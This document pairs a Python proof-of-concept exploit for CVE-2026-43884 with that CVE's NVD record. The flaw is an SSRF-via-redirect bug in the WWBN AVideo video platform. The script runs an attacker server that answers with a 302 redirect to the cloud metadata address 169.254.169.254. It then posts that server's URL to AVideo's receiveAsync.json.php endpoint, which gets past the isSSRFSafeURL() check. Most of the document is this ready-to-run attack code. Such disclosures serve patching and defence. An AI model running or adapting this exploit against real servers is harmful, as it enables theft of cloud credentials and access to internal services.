CVE-2026-43884

# This PoC demonstrates how to exploit the SSRF via redirect. # It sets up a malicious server that redirects to an internal metadata service. import threading import time from http.server import HTTPServer, BaseHTTPRequestHandler import requests class MaliciousRedirectHandler(BaseHTTPRequestHandler): """ Handler that redirects incoming requests to a sensitive internal address. This simulates the attacker-controlled server. """ def do_GET(self): # Log the request from the vulnerable server print(f"[*] Received request from: {self.client_address[0]}") # Send a 302 Redirect to the AWS Metadata Service (or other internal target) # This bypasses isSSRFSafeURL() because the initial URL was 'attacker.com' target_internal_url = "http://169.254.169.254/latest/meta-data/" self.send_response(302) self.send_header('Location', target_internal_url) self.end_headers() def log_message(self, format, *args): # Suppress default logging pass def start_redirect_server(port=8000): """Starts the HTTP server in a separate thread.""" server = HTTPServer(('0.0.0.0', port), MaliciousRedirectHandler) thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() print(f"[*] Malicious redirect server listening on 0.0.0.0:{port}") return server if __name__ == "__main__": # 1. Start the attacker's server start_redirect_server() attacker_url = "http://attacker-server-ip:8000" # 2. Target URL (Vulnerable Endpoint) # Replace with actual target IP/Domain target_endpoint = "http://localhost/avideo/plugin/AI/receiveAsync.json.php" print(f"[*] Attempting to trigger SSRF on {target_endpoint}") print(f"[*] Payload URL: {attacker_url}") # 3. Send the payload # The parameter name 'url' might vary based on the actual endpoint implementation try: data = { "url": attacker_url } response = requests.post(target_endpoint, data=data, timeout=5) print(f"[*] Request sent. Status code: {response.status_code}") print("[*] If vulnerable, the server has now fetched http://169.254.169.254/latest/meta-data/") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") # Keep script running to handle the redirect request try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[*] Shutting down server.")

{"cve": {"id": "CVE-2026-43884", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:13.073", "lastModified": "2026-05-11T22:22:13.073", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, two endpoints (plugin/AI/receiveAsync.json.php and objects/EpgParser.php) in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the initial URL, the redirect target bypasses all SSRF protections. Commit 603e7bf77a835584387327e35560262feb075db3 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/603e7bf77a835584387327e35560262feb075db3", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2hch-c97c-g99x", "source": "[email protected]"}]}}